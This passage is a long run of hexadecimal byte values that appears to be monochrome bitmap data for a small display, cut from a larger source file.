0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0X00,0X00,0X03,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFE,0X00,0X7F,0XFF,0XFF,0XFF,0XF8,0X01,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFC,0X1F,0XFE,0X3F,0XFF,0XFF,0X8F,0XFF,0X01,0XFF,0XFE,0X3F,0XFF,0XE0,0X1F,
0XF0,0X07,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X7F,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0X1F,0XE0,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0X00,0X3F,0XFF,0XFF,0XFF,0XF0,0X03,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFC,0X1F,0XFE,0X3F,0XFF,0XFE,0X07,0XFE,0X00,0X7F,0XFE,0X3F,0XFF,0XC0,0X3F,
0XF0,0X07,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XC0,0X3F,0XF0,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XF8,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0X80,0X1F,0XFF,0XFF,0XFF,0XE0,0X07,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFE,0X00,0X1F,0X00,0X00,0X00,0X00,0X1F,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFC,0X3F,0XFE,0X3F,0XFF,0XFC,0X03,0XFC,0X00,0X3F,0XFE,0X3F,0XFF,0XC0,0X3F,
0XF8,0X03,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XC0,0X1F,0XF0,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFC,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XE0,0X0F,0XFF,0XFF,0XFF,0XC0,0X1F,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFC,0X00,0X0F,0X00,0X00,0X00,0X00,0X1E,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X3F,0XFE,0X3F,0XFF,0XFC,0X61,0XF8,0X7E,0X1F,0XFE,0X3F,0XFF,0XC0,0X3F,
0XF8,0X03,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XC0,0X0F,0XC0,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFC,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFF,0XFF,0X00,0X3F,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFC,0X00,0X0F,0X00,0X00,0X00,0X00,0X1C,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X3F,0XFE,0X3F,0XFF,0XF8,0XF1,0XF0,0XFF,0X9F,0XFE,0X3F,0XFF,0X80,0X3F,
0XF8,0X03,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XE0,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFE,0X00,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XF8,0X01,0XFF,0XFF,0XFE,0X00,0X7F,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFC,0X00,0X0F,0X00,0X00,0X00,0X00,0X1C,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X3F,0XFE,0X00,0X1F,0XF9,0XF8,0XF1,0XFF,0X8F,0XFE,0X3F,0XFF,0X80,0X7F,
0XF8,0X03,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XF0,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFE,0X00,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XFC,0X00,0XFF,0XFF,0XFC,0X00,0XFF,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFE,0X00,0X0F,0X00,0X00,0X00,0X00,0X1E,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X7F,0XFE,0X00,0X07,0XF9,0XF8,0XF3,0XFF,0XCF,0XFE,0X3F,0XFF,0X80,0X00,
0X00,0X01,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XE0,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFE,0X00,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XFC,0X00,0X7F,0XFF,0XF8,0X00,0XFF,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X7F,0XFE,0X00,0X01,0XF9,0XF0,0XF3,0XFF,0XCF,0XFE,0X3F,0XFF,0X80,0X00,
0X00,0X01,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XE0,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFE,0X00,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XE0,0XFF,0XFE,0X00,0X00,0XFC,0XE1,0XF3,0XFF,0XCF,0XFE,0X3F,0XFF,0X00,0X00,
0X00,0X01,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XC0,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFE,0X00,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XF0,0X00,0X0F,0XFF,0XC0,0X00,0X3F,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XC0,0XFF,0XFF,0XFF,0X00,0X7C,0X01,0XF3,0XFF,0XFF,0XFE,0X3F,0XFF,0X00,0X00,
0X00,0X00,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X70,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFE,0X00,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XE0,0X00,0X07,0XFF,0X80,0X00,0X1F,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XC1,0XFF,0XFF,0XFF,0XE0,0X7E,0X03,0XF3,0XFF,0XFF,0XFE,0X3F,0XFF,0X00,0X00,
0X00,0X00,0XFF,0X80,0X7F,0XF8,0X01,0XFF,0X80,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFE,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0X80,0X10,0X03,0XFF,0X00,0X20,0X0F,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0X83,0XFF,0XFF,0XFF,0XF8,0X3F,0X8F,0XF3,0XFF,0XFF,0XFE,0X3F,0XFE,0X00,0X00,
0X00,0X00,0XFF,0X80,0X7F,0XF8,0X01,0XFF,0X80,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFF,0X00,0X7F,0XFC,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0X00,0X3C,0X01,0XFE,0X00,0XF0,0X03,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0X03,0XFF,0XFF,0XFF,0XFC,0X3F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XFE,0X00,0X00,
0X00,0X00,0XFF,0X80,0X3F,0XF0,0X01,0XFF,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFF,0X00,0X7F,0XFC,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFE,0X00,0X7E,0X00,0X78,0X01,0XF8,0X01,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFE,0X07,0XFF,0XFF,0XFF,0XFC,0X1F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XFE,0X01,0XFF,
0XFF,0X00,0X7F,0X80,0X3F,0XE0,0X01,0XFF,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFF,0X00,0X3F,0XF8,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFC,0X00,0XFF,0X00,0X30,0X03,0XFC,0X00,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFC,0X0F,0XFF,0XFF,0XFF,0XFE,0X1F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XFE,0X01,0XFF,
0XFF,0X00,0X7F,0X80,0X3F,0XC0,0X01,0XFF,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0X80,0X1F,0XF0,0X03,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XF0,0X03,0XFF,0X80,0X00,0X07,0XFF,0X00,0X7F,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF8,0X1F,0XFF,0XFF,0XFF,0XFE,0X1F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XFC,0X03,0XFF,
0XFF,0X00,0X7F,0XC0,0X0F,0X00,0X01,0XFF,0X80,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0X80,0X0F,0XE0,0X03,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XE0,0X07,0XFF,0XC0,0X00,0X1F,0XFF,0X80,0X1F,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF8,0X3F,0XFF,0XFF,0XFF,0XFE,0X1F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XFC,0X03,0XFF,
0XFF,0X00,0X3F,0XC0,0X00,0X00,0X01,0XFF,0X80,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0XC0,0X00,0X00,0X07,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XC0,0X0F,0XFF,0XF0,0X00,0X3F,0XFF,0XC0,0X0F,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X7F,0XFF,0XFF,0XFF,0XFE,0X1F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XFC,0X03,0XFF,
0XFF,0X80,0X3F,0XC0,0X00,0X03,0X01,0XFF,0XC0,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0XE0,0X00,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0X80,0X1F,0XFF,0XF8,0X00,0X7F,0XFF,0XE0,0X07,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XE0,0X7F,0XFF,0XFF,0XFF,0XFE,0X1F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XF8,0X03,0XFF,
0XFF,0X80,0X3F,0XE0,0X00,0X06,0X01,0XFF,0XC0,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0XE0,0X00,0X00,0X1F,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0X00,0X7F,0XFF,0XFC,0X00,0XFF,0XFF,0XF8,0X03,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X1F,0X00,0X00,0X1F,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XC0,0XFF,0XFF,0XFF,0XFF,0XFE,0X1F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XF8,0X07,0XFF,
0XFF,0X80,0X1F,0XF0,0X00,0X0E,0X01,0XFF,0XF0,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0XF0,0X00,0X00,0X3F,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFC,0X00,0XFF,0XFF,0XFE,0X01,0XFF,0XFF,0XFC,0X00,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X1F,0XC0,0X00,0X7E,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0X81,0XFF,0XFF,0XFF,0XFF,0XFC,0X3F,0XFF,0XF3,0XFF,0XCF,0XFE,0X3F,0XF8,0X07,0XFF,
0XFF,0XC0,0X1F,0XF8,0X00,0X1E,0X01,0XFF,0XE0,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0XFC,0X00,0X00,0X7F,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XF8,0X01,0XFF,0XFF,0XFF,0X87,0XFF,0XFF,0XFE,0X00,0X7F,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XF0,0X01,0XFE,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0X03,0XFF,0XFF,0XFF,0XFF,0XFC,0X3F,0XFF,0XF3,0XFF,0XCF,0XFE,0X3F,0XF0,0X07,0XFF,
0XFF,0XC0,0X1F,0XFC,0X00,0X3E,0X01,0XFF,0XC0,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0XFF,0X00,0X03,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XF0,0X03,0XFF,0XFF,0XFF,0XDF,0XFF,0XFF,0XFF,0X00,0X3F,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF0,0X1F,0XFF,0XFF,0XFF,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,
0X07,0XFF,0XFF,0XFF,0XFF,0XF8,0X7F,0XFF,0XF3,0XFF,0XCF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFF,0XFF,0XFF,0X80,0X3F,0XFC,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X1F,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XE0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X1F,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XE0,0X3F,0XFF,0XFF,0XFF,0X80,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,
0X0F,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0XFF,0XF3,0XFF,0X8F,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X7F,0XFE,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0X80,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X07,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC0,0X7F,0XFF,0XFF,0XFF,0XC0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFC,
0X0F,0XFF,0XFF,0XFF,0XFF,0XE0,0XFF,0XFF,0XF1,0XFF,0X8F,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X03,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X80,0XFF,0XFF,0XFF,0XFF,0XE0,0X3F,0XFF,0XFF,0XFF,0XFF,0XF8,
0X00,0X00,0X07,0XF9,0XFF,0X81,0XFF,0XFF,0XF8,0XFF,0X1F,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFE,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X01,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X01,0XFF,0XFE,0X1F,0XFF,0XF0,0X3F,0XFF,0XFF,0XFF,0XFF,0XF8,
0X00,0X00,0X07,0XF8,0X00,0X03,0XFF,0XFF,0XF8,0X00,0X3F,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X01,0XFF,0XFF,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFC,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X03,0XFF,0XFE,0X0F,0XFF,0XF8,0X1F,0XFF,0XFF,0XFF,0XFF,0XF8,
0X00,0X00,0X07,0XF8,0X00,0X07,0XFF,0XFF,0XFC,0X00,0X7F,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X01,0XFF,0XFF,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XF0,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X3E,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X07,0XFF,0XFE,0X0F,0XFF,0XFC,0X1F,0XFF,0XFF,0XFF,0XFF,0XF8,
0X00,0X00,0X07,0XF8,0X00,0X0F,0XFF,0XFF,0XFF,0X00,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0XFF,0XFE,0X00,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XE0,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X1E,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X0F,0XFF,0XFE,0X0F,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XF8,
0X00,0X00,0X07,0XF8,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X7F,0XFC,0X00,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XC0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X0E,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X3F,0XF0,0X01,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0X80,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X06,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
